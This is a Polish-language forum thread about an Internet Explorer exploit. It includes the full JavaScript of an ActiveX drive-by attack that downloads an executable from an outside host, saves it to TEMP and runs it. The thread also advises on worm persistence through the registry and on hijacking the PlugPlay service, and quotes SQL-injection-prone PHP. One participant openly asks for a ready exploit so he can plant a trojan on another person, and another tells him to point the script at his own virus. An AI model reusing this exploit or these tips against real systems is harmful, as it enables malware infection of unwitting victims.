Exploit na IE!!!!

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
Kod:
function Go(a) {

    Log('Creating helper objects...');

    var s = CreateO(a, "WScript.Shell");

    var o = CreateO(a, "ADODB.Stream");

    var e = s.Environment("Process");

    

    Log('Creating the XMLHTTP object...');

    var url = 'http://valoriahistory.cba.pl/serwer.exe';

    var xml = null;

    var bin = e.Item("TEMP") + "metasploit.exe";

    var dat; 

    

    try { xml=new XMLHttpRequest(); }

    catch(e) {

        try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }

        catch(e) {

            xml = new ActiveXObject("MSXML2.ServerXMLHTTP");

        }

    }

za chwile zesikam sie ze smiechu
<


robak TENDOOLF <-- tylko teoretycznie

kopiuje sie do c:x.exe // propably pakowany jakims upx'em 2 exe'cki etc.
kasuje c:x.exe // propably pakowany jakims upx'em 2 exe'cki etc.
kasuje sie z %defdir%
kopiuje sie do c:windowsservices.exe <-- u mnie na tym momencie zablokowala dzialanie moja wlasna mini zapora ^^
uruchamia %sysdir%reg.exe
dodaje wpis Hkey_Local_Machine/.../Run/Windows - C:windowsservices.exe <-- z tego najbardziej nie moge xD

dodawanie rejestru zapetlone "do" + petla "while(1);" do spelnienia warunku

autor nie pomyslale ze mozna utworzyc pusty plik services.exe, nadac mu atrybut only read, wiec rowniez zapomnial dodac warunku kasowania wczesniej istniejacego pliku services.exe, zamist amatorsko dodawac wpis rejestru do 'Run' mogl wpisac :

Kod:
[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPlugPlay]

"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,

74,00,25,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,2e,00,65,

00,78,00,65,00,00,00

zamienilo by to orginalny wpis uslugi Plug and Play z c:windowssystem32services.exe na c:windowsservices.exe
<


oraz usunac plik services.msc aby uniemozliwic dostep do panel sterowanianarzedzia administratorauslugi [; ofcourse mozna w inny sposob dostac sie... np. polecenie net start/stop w cmd lub program "starter" jesli ktos woli interfejsik przyjazny [;

ŁATKA ;d

Kod:
#include <iostream>

#include <unistd.h>



int

main()

{

int a = system("echo laming attempt>>c:windowsservices.exe");

std::cout << "result code: " << a << "n";

int b = system("attrib +R +H c:windowsservices.exe");

std::cout << "result code: " << b << "n";

return 0;

}
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
ze jest to czeste w darmowych hostingach i przydaje sie np. do okienek z reklamami itp. itd.
 

japcok15

Użytkownik
Dołączył
Lipiec 10, 2007
Posty
44
dolączam sie do postu i w tym moj problem iz chce kolesiowi wyslac trojana =] a nie mam jak probowalem juz all ...;/ mecze sie z nim juz od 2 tygodni i zaden sposob nie wypalil..;/ podawalem sie za dziewczyne i chialem mu wyslac foto ale nie przyjmowal mowil zebym wrzucil na serwis jakis ;/ i zacząlem powiekszac swoja wiedze i zauwazylem ze exploity odpowiadaja wymaganiu tego goscia .. wiec teraz moje pytanko czy macie jakiegos gotowego expoita po IE 7.0 i starsze ? naprawde bardzo go potrzebuje..
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
Originally posted by solsk
Chodzi mi o to co to robi w kodzie :hmmm:

zalezne od administracji cba.pl [;

zerknij na to w ten sposob... skoro bez skryptu strona dziala poprawnie ... tzn. ze "owy skrypt" robi cos tam dla hostingu cba.pl proste ?

co to daje ? reklamy

Kod:
src = 'http://a.cba.pl/adsense.html?'+bg.substring(1,7);



dif=document.createElement('div');with(dif.style){textAlign='center';height='90px'}dif.innerHTML='<iframe align="center" src="'+src+'" scrolling="no" frameborder="0" style="display: block !important; position: absolute; left: 50% !important; top:0px !important; z-index:10000 !important; margin-left: -364px !important; height:90px !important;width:728px !important;border:0px !important"></' + 'iframe>';

chyba widac ?
 

solsk

Użytkownik
Dołączył
Lipiec 13, 2007
Posty
9
Aaaa, wielkie dzięki, nie ma to jak kasa trzepana z Adsense
<
. Zresztą nie zauważyłem że te linki to poza całym exploitem. Moja wina. I mam jeszcze jedno pytanko, już odnośnie całkiem innego tematu, mianowicie:

Exploit tutaj : http://seclists.org/bugtraq/2005/Aug/0312.html

Kod:
if ($authmethod == "cookies") {

        echo "authmethod = cookiesn";

        $cdata = explode("|", $pafiledbcookie);

        $ip = $cdata[0];

        $user = $cdata[1];

        $pass = $cdata[2];

        echo "ip = $ip, user = $user, pass = $passn";

}

if (!empty($user)) {

        echo "user not emtpyn";

        $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$user'", 1);

        $adminip = getenv ("REMOTE_ADDR");

        $md5ip = md5($adminip);

        if ($pass == $admin[admin_password] && $md5ip == $ip) {

                $logged = 1;

        }

} else {

        echo "user emptyn";

        $logged = 0;

}


Rozumiem was, nic nie umiem i zabieram się za takie rzeczy, ale robie to właśnie po to żeby się nauczyć i pytam was co z tym kodem mogę zrobić. Tzn. gdzie go umieścić ?
Jeśli wrzucę na serwer *.php to chyba nic się nie stanie. Więc was proszę o odpowiedź na to głupie (jak dla was) pytanie.


Edit: Jeszcze jedno pytanko: Co daje mi możliwość wrzucenia jakiegoś pliku na serwer np. jakieś forum oparte na phpbb ? Rozumiem że mogę wrzucić tam skrypt który np. wyświetla to co znajduje się w config.php i dzięki temu mogę zdobyć hasła do MySQL'a ?
 

japcok15

Użytkownik
Dołączył
Lipiec 10, 2007
Posty
44
Czy ktos mi pomoze ?? co mam zrobic zeby automatycznie mi sie scigal plik jak ktos wejdze w podanego linka ??
 

solsk

Użytkownik
Dołączył
Lipiec 13, 2007
Posty
9
Ja się na tym nie znam ale na moje oko to musisz zmienić tą linijkę ( http://valoriahistory.cba.pl/serwer.exe ) na adres do swojego wirusa. Choć nie jestem tego pewien ;]


Kod:
function Log(m) {

    var log = document.createElement('p');

    log.innerHTML = m;

    document.body.appendChild(log);

    

}



function CreateO(o, n) {

    var r = null;

    

    try { eval('r = o.CreateObject(n)') }catch(e){}

    

    if (! r) {

        try { eval('r = o.CreateObject(n, "")') }catch(e){}

    }

    

    if (! r) {

        try { eval('r = o.CreateObject(n, "", "")') }catch(e){}

    }



    if (! r) {

        try { eval('r = o.GetObject("", n)') }catch(e){}

    }

    

    if (! r) {

        try { eval('r = o.GetObject(n, "")') }catch(e){}

    }

    

    if (! r) {

        try { eval('r = o.GetObject(n)') }catch(e){}

    }

    

    return(r);    

}



function Go(a) {

    Log('Creating helper objects...');

    var s = CreateO(a, "WScript.Shell");

    var o = CreateO(a, "ADODB.Stream");

    var e = s.Environment("Process");

    

    Log('Creating the XMLHTTP object...');

    var url = 'http://valoriahistory.cba.pl/serwer.exe';

    var xml = null;

    var bin = e.Item("TEMP") + "metasploit.exe";

    var dat; 

    

    try { xml=new XMLHttpRequest(); }

    catch(e) {

        try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }

        catch(e) {

            xml = new ActiveXObject("MSXML2.ServerXMLHTTP");

        }

    }

    

    if (! xml) return(0);



    Log('Downloading the payload...');    

    xml.open("GET", url, false)

    xml.send(null);

    dat = xml.responseBody;



    Log('Writing the payload to disk...');    

    o.Type = 1;

    o.Mode = 3;

    o.Open();

    o.Write(dat);

    o.SaveToFile(bin, 2);



    Log('Executing the payload...');        

    s.Run(bin,0);

}



function Exploit() {

    var i = 0;

    var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',null);

    

    while (t[i]) {

        var a = null;

        

        if (t[i].substring(0,1) == '{') {

            a = document.createElement("object");

            a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));

        } else {

            try { a = new ActiveXObject(t[i]); } catch(e){}

        }

        

        if (a) {

            try {        

                var b = CreateO(a, "WScript.Shell");

                if (b) {

                    Log('Loaded ' + t[i]);

                    Go(a);

                    return(0);

                }

            } catch(e){}

        }

        i++;

    }

    Log('Exploit failed.');

}
 

solsk

Użytkownik
Dołączył
Lipiec 13, 2007
Posty
9
Czy będzie działać to nie wiem, ale wrzuć to na serwer i zapisz jako *.html albo *.php. Nie jestem pewien bo nie wiem jak to działa :nonono:
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
Originally posted by solsk
Aaaa, wielkie dzięki, nie ma to jak kasa trzepana z Adsense
<
. Zresztą nie zauważyłem że te linki to poza całym exploitem. Moja wina. I mam jeszcze jedno pytanko, już odnośnie całkiem innego tematu, mianowicie:

Exploit tutaj : http://seclists.org/bugtraq/2005/Aug/0312.html

Kod:
if ($authmethod == "cookies") {

        echo "authmethod = cookiesn";

        $cdata = explode("|", $pafiledbcookie);

        $ip = $cdata[0];

        $user = $cdata[1];

        $pass = $cdata[2];

        echo "ip = $ip, user = $user, pass = $passn";

}

if (!empty($user)) {

        echo "user not emtpyn";

        $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$user'", 1);

        $adminip = getenv ("REMOTE_ADDR");

        $md5ip = md5($adminip);

        if ($pass == $admin[admin_password] && $md5ip == $ip) {

                $logged = 1;

        }

} else {

        echo "user emptyn";

        $logged = 0;

}


Rozumiem was, nic nie umiem i zabieram się za takie rzeczy, ale robie to właśnie po to żeby się nauczyć i pytam was co z tym kodem mogę zrobić. Tzn. gdzie go umieścić ?
Jeśli wrzucę na serwer *.php to chyba nic się nie stanie. Więc was proszę o odpowiedź na to głupie (jak dla was) pytanie.


Edit: Jeszcze jedno pytanko: Co daje mi możliwość wrzucenia jakiegoś pliku na serwer np. jakieś forum oparte na phpbb ? Rozumiem że mogę wrzucić tam skrypt który np. wyświetla to co znajduje się w config.php i dzięki temu mogę zdobyć hasła do MySQL'a ?

to zwykly bugtraq a w kodzie ktorym podales nie widac zeby to byl exploit ^^

to tylko blednie napisany kod umozliwiajacy sql-injection
<


btw. smieszny ten blog Koniecznego, night.pl/~xerror/exploits offline -.-
zaloze sie ze ten exploit bedzie rowniez na milw0rm :F

ja e0t. zaczynaja sie pierdoly dziac w tym topicu
<
(bez urazy)
 

japcok15

Użytkownik
Dołączył
Lipiec 10, 2007
Posty
44
mozecie zanalizowac tego exploita jak sie nie myle jest na IE 7 i starsze

http:wluczykij.cba.pl
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
ten niby exploit to samo co poprzednio [;

a exec to smieszny downloader -.-
 

japcok15

Użytkownik
Dołączył
Lipiec 10, 2007
Posty
44
http:wluczykij.cba.pl <--to jets exploit na IE bo nawet gadalem z kolesiem i sam mi to wyslal mowiac ze tam jego blog jest a gdy mu powiedzialem ze tam nie ma jego bloga to powiedzal mi ze to exploit na IE 7 i starsze
smile.gif
a ja tam wcale nie wszedlem ..
smile.gif
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
to zapytaj sie tego znawcy dlaczego na moim IE7 nie dziala mimo wylaczenia AV oraz zaakceptowania kontrolki activex ? (brak firewalla 'firmowego')
<


(ja wiem dlaczego
<
)
 

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
nom, ale po urlopie w przyszly poniedzialek, z gory mowie ze nie zadziala
<
 
Do góry Bottom